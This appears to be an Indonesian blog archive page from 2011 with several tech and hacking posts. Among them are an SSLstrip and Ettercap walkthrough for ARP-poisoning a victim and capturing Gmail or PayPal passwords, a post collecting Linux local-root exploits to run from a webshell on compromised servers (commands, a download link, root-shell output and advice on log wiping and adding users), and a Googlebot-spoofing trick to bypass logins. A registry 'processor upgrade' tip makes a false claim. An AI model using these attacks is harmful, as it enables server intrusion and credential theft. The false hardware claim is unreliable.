Tampilkan postingan dengan label ADMIN. Tampilkan semua postingan
Tampilkan postingan dengan label ADMIN. Tampilkan semua postingan

Selasa, 14 Juni 2011

cara mengganti nama processor

- Klik Start ► Run ► Regedit

HKEY_LOCAL_MACHINE ► HARDWARE ► 0

- Klik 2x pada ProcessorName.... dan ubah menjadi pentium 5. Maka komputer anda sudah menjadi pentium 5 atau i500 pun bisa

- Klik kanan pada My Computer dan klik Properties untuk melihat hasil nyaTrik kali ini memang benar menggubah spesifikasi komputer kita dari Pentium 4 ke Pentium 5.

Sabtu, 11 Juni 2011

8 aplikasi-aplikasi open source


8 aplikasi-aplikasi open source yang sangat berguna untuk seorang web designer.

Aplikasi tersebut dapat membantu anda mempermudah proses pembuatan suatu website.

1. SeaMonkey
SeaMonkey dikembangkan oleh Mozilla Foundation.
SeaMonkey merupakan “all-in-one” web browser yang sederhana namun canggih untuk editor HTML .
Download : http://www.seamonkey-project.org/

2. KompoZer.
KompoZer adalah fully-featured web authoring system yang terpadu klien FTP yang intuitif dan support untuk semua sistem operasi.
Download : http://kompozer.net/

3. NOTEPAD++.
NotePad ++ merupakan aplikasi open source yang sangat popupler sebagai editor teks untuk Windows.
Walaupun tidak hanya semata-mata untuk web designer tetapi aplikasi ini memiliki “source code editor” yang mendukung editor HTML, XML, CSS, dan JavaScript.
Download : http://notepad-plus.sourceforge.net/uk/site.htm

4. Bluefish Editor.
Bluefish Editor adalah aplikasi yang ringan dan cepat untuk proses editor yang ditujukan untuk perancang dan programer web.
Mempunyai fasiltas Wizards yang berguna untuk pembuatan dokumen HTML.
Download : http://bluefish.openoffice.nl/
5. Quanta Plus.
Quanta Plus adalah pengembangan Web IDE.
Quanta Plus sangat extensible dan dapat menjalankan skrip kustom.
Aplikasi ini sangat baik untuk editor css karena memiliki kode hints dan auto komplet sintaks.
Download : http://quanta.kdewebdev.org/
6. Amaya.
Amaya adalah aplikasi gratis, open source web editor dan browser web yang dikembangkan oleh World Wide Web Consortium (W3C).
Amaya dimulai sebagai HTML / CSS editor dan telah berkembang menjadi sebuah editor untuk berbagai sistem berbasis XML seperti MathML dan SVG.
Download : http://www.w3.org/Amaya/
7. OPEN BEXI HTML Builder.
OPEN BEXI HTML Builder adalah browser berbasis open source untuk menciptakan aplikasi HTML halaman web.
OPEN BEXI HTML Builder memiliki CSS color picker built.
Download : http://sourceforge.net/projects/ob-htmlbuilder/

8. jEdit.
jEdit adalah sebuah editor teks untuk programmers.
jEdit dapat berjalan di Mac, Windows, dan Linux dan mempunyai fasilitas “syntax highlighting” untuk HTML, XML, CSS, JavaScript dan bahasa pemrograma lainnya.
Download : http://www.jedit.org/

Selasa, 07 Juni 2011

Cara Download Cepat dan Stabil Menggunakan Proxy


Cara Download Cepat dan Stabil Menggunakan Proxy


  • Buka situs http://www.ip-adress.com/proxy_list/ Porxy yang terlihat adalah Proxy dan Port-nya Contoh jika terlihat : 71.236.8.215:3128 , Maka Proxy:71.236.8.215 dan Port: 3128
  • Copy Proxy dari salah satu negara (disarankan Amerika, inggris, atau negara-negara yang notabene memiliki akses internet cepat)


  • Pada Mozilla Firefox buka menu Tool > Option

  • Tab menu ke Advance > Network > Settings…

  • Pilih Manual proxy configuration Paste Proxy yang sudah dicopy tadi ke HTTP Proxy dan Paste juga Port-nya, serta check list di bagian Use this proxy server to all protocols > Klik OK > dan OK lagi
  • Buka New tab di Mozilla Firefox dan coba buka www.google.com jika berhasil maka proxy siap dipakai, jika tidak berhasil maka cari proxy lainnya untuk dicoba

  • Selanjutnya konfigurasi Proxy di IDM, buka menu Downloads > Options > Proxy, check list di bagian Use HTTP proxy, Use HTTPS proxy, dan Use FTP proxy, kemudian Paste Proxy yang sukses dicoba tadi beserta Port-nya, kosongkan bagian UserName dan Password, Klik OK
  • Selesai, coba download dan rasakan download lebih kencang dan stabil

Rabu, 25 Mei 2011

USB Port Locked 2.0 Free


Satu lagi software yang berfungsi untuk meminimalisir penyebaran virus melalui media flashdisk, software ini bernama USB Port Locked 2.0. Sebelumnya saya sudah pernah share USB Write Protect v1.10.

USB Port Locked 2.0 merupakan sebuah tool security yang berfungsi untuk mengunci dan membuka port USB agar meminimalisir penyebaran virus melalui port USB, khususnya media flashdisk.
USB Port Locked 2.0 Free
Untuk menjalanakan aplikasi ini, sobat blogger harus menjalanakan dengan "Run As Administrator".

Password : www.remo-xp.com
Download USB Port Locked 2.0 Free

credit to REMO-XP

Senin, 02 Mei 2011

SSL Hacking


Salah satu cara yang paling berhasil untuk mendapatkan informasi seperti password, user id dll dalam LAN (local area network) adalah melalui orang dalam serangan tengah. Aku tidak akan pergi ke jauh ke Man dalam serangan tengah, tetapi dalam kata-kata sederhana dapat dijelaskan sebagai penyerang atau hacker mendengarkan semua informasi yang dikirim di antara klien dan server Untuk mencegah serangan semacam ini Email penyedia dimulai. menggunakan Hypertext Transfer Protocol Secure (HTTPS) Ini adalah kombinasi dari Hypertext Transfer Protocol (HTTP) dengan SSL (Secure socket layer) protokol untuk menyediakan komunikasi terenkripsi antara client dan server. Jadi, saat seorang hacker karies sebuah serangan Mimt korbanadalah memperingatkan dengan Sertifikat SSL tidak valid

Dalam tutorial ini saya akan mengajarkan bagaimana melaksanakan serangan MITM berhasilKonsep: -Kami Ketahuilah bahwa HTTP (Hypertext Transfer Protocol) hanya mengirimkan semua informasi melalui teks biasa. Jadi jika kita membuat korban menggunakan HTTP bukan HTTPS dapat terhubung situs seperti Gmail, Pay pal. kita akan mampu melakukan serangan MITM yang berhasil dengan keluar menyebabkan kecurigaan Untuk melakukan hal ini kita akan menggunakan alat yang disebut strip SSLLebih Dibaca: Apa itu SSL (Secure Socket Layer)Hal yang kita Butuh

1. strip SSL: Anda dapat mencari Google untuk strip SSL datang baik di windows dan versi Linux. Saya akan menggunakan versi windows dalam tutorial ini2. Ettercap untuk melakukan serangan MITMDemonstrasi: -1. Buka SSL strip dan mengisi semua informasi yang diperlukan untuk arpsoof, jaringan, strip ssl, data perubahan. Jika Anda tidak tahu apa yang harus dimasukkan cukup klik cek otomatis. ingat untuk memeriksa apakah HTTPS HTTP termasuk dalam data Perubahan, akhirnya klik ok


2. Sekarang pilih IP korban dan klik open

3. Sekarang buka ettercap pergi ke mengendus-unsniffed mengendus dan pilih antarmuka jaringan anda dan klik ok


4. Sekarang pilih-scan host host Setelah pemindaian selesai Buka daftar. Host dari tab host.. Sekarang pilih alamat IP router sebagai target 1 dan korban IP sebagai target 2


5. Sekarang pilih keracunan MITM-ARP dan klik ok seperti yang ditunjukkan


6. Finally select start-start sniffing .Sekarang, ketika korban log ke gmail dia akan menggunakan HTTP dan tidak HTTPS Oleh karena itu kita dapat mendapatkan User id, password seperti yang ditunjukkan di bawah ini


Counter langkah-langkah:1. setiap kali Anda melakukan transaksi online seperti pembayaran kartu kredit, login Email Bank atau login selalu memastikan bahwa Anda Gunakan HTTPS2. Selalu memeriksa sertifikat SSL sebelum melakukan transaksi online

Exploit Local Root


untuk xpl ini, langkah awal yg harus kita lakukan adalah
cek kesedian "gcc dan ln /bin/ping <===== via command webshell"
jika gcc dan ln /bin/ping nya sukses
maka w00t 85%

biasanya(jika gagal) mentok di bagian ini "gcc -w -fPIC -shared -o /tmp/exploit payload.c"
dan ini "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3"

klo gw biasanya
klo mo eksekusi, make xpl ini
gw ubah direktorynya
defaulnya /tmp/exploit
misal, /home/user/public_html/shell
jadinya seperti ini, /home/user/public_html/shell/exploit
dan seterusnya
klo gw, biasanya make *.c(payload.c)nya dr shell


gambar ini menunjukan, xpl ini w00t 100%
http://oi51.tinypic.com/r1nbk3.jpg
http://oi54.tinypic.com/9b9kp0.jpg

gambar ini menunjukan, xpl ini w00t 95%
http://oi56.tinypic.com/2gy3720.jpg

gambar ini menunjukan, gatot =))
http://oi56.tinypic.com/2mn3wi8.jpg

fedora 32
http://oi54.tinypic.com/4sz2ud.jpg

mudah dan pahamkan :D
oh iyah, pk xpl ini gg w00t http://www.exploit-db.com/exploits/15024/(2618)
gambar² ntu :P


gw sih biasanya klo mo cek ap² di command webshell ajah

bentuk videonya
http://www.youtube.com/watch?v=BENgdFhON7w

Download xpl : http://islamiccenteremporia.org/.../xpl/xpl.tgz
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Linux RDS Protocol Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15285/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15285.png

xpl 263x32 dan 263x64

w00t test on fedora,openSUSE dan ubuntu

fedora
http://oi52.tinypic.com/aphap0.jpg

ubuntu
http://oi54.tinypic.com/slk037.jpg

openSUSE
http://oi52.tinypic.com/opn5f8.jpg


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
   GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Tavis Ormandy
http://www.exploit-db.com/exploits/15304/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15304.png

    2.12.1, FC13
    2.5, RHEL5 / CentOS5
    2.11.1, Ubuntu 10


klo di xpl ini, namanya
dpkg32 dan dpkg64

untuk file *.c nya bisa di liat disini
http://forum.devilzc0de.org/thread-4453.html

klo mau coba yg manual
langkah awal yaitu
ktik d command webshell kalian
dpkg, jika dpkg ada maka w00t 70%

bisanya mentok disini
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

debian 32 bit
http://oi52.tinypic.com/91cay8.jpg

debian 64 bit
http://oi56.tinypic.com/110kqjp.jpg

buntu 32 bit
http://oi53.tinypic.com/2wr2ro1.jpg

blom pernah w00t
klo nyoba centOS dan fedora, ntu gw :P



▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
2.6.37 Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/
screen-shot-2010-12-07-at-72005-pm.png

masih anget ini xpl =))

test 32 bit
http://oi52.tinypic.com/35irwaw.jpg

64bitnya lom di test

xpl ini 2637x32 dan 2637x64

info
archives.neohapsis.com/archives/fulldisclosure/2010-12/0128.html


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
     CVE-2009-1046 Virtual Console UTF-8  set_selection() off-by-one(two) Memory Corruption
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

coded by: sgrakkyu antifork.org
http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html

Tested on target:
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
Fedora Core 10 x86_64 (default installed kernel - without selinux)

./26x64
[**] Patching ring0 shellcode with userspace addr: 0x4017e0
[**] Using port: 25433
[**] Getting slab info...
[**] Mapping Segments...
[**] Trying mapping safe page...Page Protection Present (Unable to Map Safe Page)
[**] Mapping High Address Page (don't kill placeholder child)
[**] Mapping Code Page... Done
[**] Binding on CPU 0
[**] Start Server Thread..
...
...
...
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
[**] Umapped end-to-end fd: 212
[**] Unsafe fd: ( 210 224 214 212 )
[**] Hijacking fops...
[**] Migrate evil unsafe fds to child process..
[**] Child process 25463 _MUST_ NOT die..keep it alive:)
[**] Got root!
# id
uid=0(root) gid=0(root) groups=1001(anon)


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
 CVE-2009-0065 Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

coded by: sgrakkyu antifork.org
http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html

NOTE: you need at least one sctp application bound on the target box

Supported target:
Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
Fedora Core 10 x86_64 (default installed kernel)
OpenSuse 11.1 x86_64  (default installed kernel)

./26sctp64 -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

xpl ros132
http://oi56.tinypic.com/35i20bb.jpg

xpl 2618
http://www.youtube.com/watch?v=8bWUIQ55Wdw

xpl 263xxx64
http://www.youtube.com/watch?v=oct7p5hKdfU

xpl spender
http://www.youtube.com/watch?v=jQ-3yIwTmug
http://oi51.tinypic.com/334jbm0.jpg

chechk.sh
http://oi55.tinypic.com/fxcsh3.jpg

sock64
http://oi54.tinypic.com/2qk5qb5.jpg

sock32
http://oi51.tinypic.com/4ujrr7.jpg

redhat32
http://oi51.tinypic.com/21ca1k8.jpg
poc = securityfocus.com/archive/1/326337


▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▌
▌ bisakan klo abis ngelocal gunakan
▌ vanish. basic bg gw 40% logica 60%.
▌ jagn pernah install sshdoor(sarangw)
▌ adduser bisa ajah udah cukup.
▌ semua xpl ini dah d uji cb
▌ tergantung kalian yg menjalaknnya.
▌ sblom d bind atw d bek-konak
▌ run dulu ajah xplnya d command webshell
▌ nanti juga tau sndiri
▌ sgini ajah dolo dan xpl ini akan update
▌ trus
▌ di mulailah dr versi yg rendah dulu
▌ apapun itu jenisnya

Menyamar Sebagai GoogleBot


Googlebot adalah perangkat lunak yang digunakan oleh Google, yang mengumpulkan dokumen-dokumen dari web untuk membangun indeks untuk dicari mesin pencari Google. 

Bagaimana jadinya ya kalo kita bisa menjadi seperti Googlebot??? Hmm.. salah satu keuntungannya adalah kita bisa mengakses area member situs-situs tertentu tanpa harus login terlebihdahulu (misalnya saja Forum).


Lalu bagaiamana cara menyamar sebagai GoogleBot??? Pertanyaan inilah yang ada selalu dibenak saya sebagai h4ck3r pemula dan "mungkin" juga menjadi keinginan anda saat ini!?! Setelah sekian lama saya browsing, akhirnya dapat beberapa referensi bagaimana kita bisa menyamar sebagai Googlebot. Oke, LET'S DO IT NOW...


Langkah pertama, kita persiapankan alatnya, yaitu:
1. PC atau Laptop
2. Mozilla Firefox
3. Add-ons User Agent Switcher 
[ DOWNLOAD & INSTALL DISINI ]
Langkah kedua, buka Mozilla Firefox dan install add-ons User Agent Switcher-nya, setelah terinstall, ikuti petunjuk dibawah ini :

Langkah ketiga, setting User Agent Switcher-nya, sebagai berikut:



Sebagai tambahan agar lebih optimal lagi, ketik di address bar: "about:config", tekan enter maka akan muncul konfigurasi Firefox tekan aja tombol yang ada tulisan "I'll be careful, I promise!". Lalu ketik pada form filter dengan kata "useragent.extra" dan akan muncul kata "general.useragent.extra.firefox" di bahwa preference name, lalu klik 2x, kemudian tambahkan di belakang dengan "; Googlebot".



Langkah keempat, lakukan penyecekan di http://private.dnsstuff.com/tools/aboutyou.ch

happy hacking